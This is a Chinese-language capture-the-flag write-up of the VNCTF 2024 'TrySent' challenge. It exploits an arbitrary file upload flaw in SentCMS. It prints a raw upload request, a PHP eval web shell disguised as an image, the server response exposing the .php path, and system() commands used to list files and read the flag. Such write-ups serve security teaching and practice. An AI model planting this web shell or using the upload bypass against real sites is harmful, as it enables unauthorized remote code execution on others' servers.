VNCTF  2024 TrySent  复现
参考:
https://blog.hanayuzu.top/articles/37dacab4
wp参考:
VNCTF官方WP
场景:

是sentcms网站管理系统,一般这些老的cms模板网站都存在着一些文件上传漏洞,我们可以试着找一下.
在浏览器中查找sentcms网站漏洞:

找到一个任意文件上传漏洞。
分析参考资料;

参考资料有一个文件上传的数据包:
文件上传数据包:
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 
 | POST /user/upload/upload HTTP/1.1Host: target.com
 Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
 Content-Length: 894
 Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
 Sec-Ch-Ua-Mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
 Sec-Ch-Ua-Platform: "Windows"
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
 Accept: */*
 Origin: https://info.ziwugu.vip/
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
 Connection: close
 
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="id"
 
 WU_FILE_0
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="name"
 
 test.jpg
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="type"
 
 image/jpeg
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="lastModifiedDate"
 
 Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="size"
 
 164264
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz
 Content-Disposition: form-data; name="file"; filename="test.php"
 Content-Type: image/jpeg
 
 JFIF
 <?php phpinfo();?>
 
 ------WebKitFormBoundaryrhx2kYAMYDqoTThz--
 
 | 
数据包中的重点字段为Referer,它代表了当前数据包是从哪个网页发送过来的,因为往往这个源网页就是网站文件上传的网页地址:
Referer:
| 1
 | Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
 | 
访问一下文件上传网页:
payload:
| 12
 3
 
 | url/user/upload/index?name=icon&type=image&limit=1=>
 http://9e1033b0-e55f-4696-96fe-c46751c3f069.vnctf2024.manqiu.top/user/upload/index?name=icon&type=image&limit=1
 
 | 

该sentcms管理系统果然存在文件上传网页。
上传我们的图片木马并抓包:
选择图片木马:

点击上传:


修改我们的图片后缀名,同时也修改我们的木马内容:
| 12
 3
 4
 
 | showfiles.png
 GIF89a
 <?php echo "win!!!";@eval($_POST['pass']);?>
 
 | 

响应包数据:
| 1
 | {"code":1,"info":{"type":"image","mime":"image\/png","size":53,"md5":"3caa99000185ea6b117489c94315ba73","sha1":"bb635efc7ab6fa6b4081444125516a8e6be88e00","savepath":"image\/3c\/aa99000185ea6b117489c94315ba73.php","ext":"php","location":"\/uploads\/","url":"\/uploads\/image\/3c\/aa99000185ea6b117489c94315ba73.php","real_url":"http:\/\/9e1033b0-e55f-4696-96fe-c46751c3f069.vnctf2024.manqiu.top\/uploads\/image\/3c\/aa99000185ea6b117489c94315ba73.php","create_time":1708353021,"savename":"showfiles.png","name":"showfiles.png","id":"10"}}
 | 
可以得到我们文件上传的地址为:
| 12
 3
 
 | "real_url":"http:\/\/9e1033b0-e55f-4696-96fe-c46751c3f069.vnctf2024.manqiu.top\/uploads\/image\/3c\/aa99000185ea6b117489c94315ba73.php"=>去除转义符
 http://9e1033b0-e55f-4696-96fe-c46751c3f069.vnctf2024.manqiu.top/uploads/image/3c/aa99000185ea6b117489c94315ba73.php
 
 | 
访问我们的木马文件:
| 1
 | http://9e1033b0-e55f-4696-96fe-c46751c3f069.vnctf2024.manqiu.top/uploads/image/3c/aa99000185ea6b117489c94315ba73.php
 | 

成功访问!!!
RCE:
payload1:
| 12
 
 | POST:pass=system('ls /');
 
 | 

发现flag相关文件:ffflelwlwlwlag
payload2:
| 12
 
 | POST:pass=system('cat /ffflelwlwlwlag');
 
 | 

flag=vnctf{6395cc8d-c38b-4286-882e-78f35345a57a} 
payload3:

phpinfo中也有flag.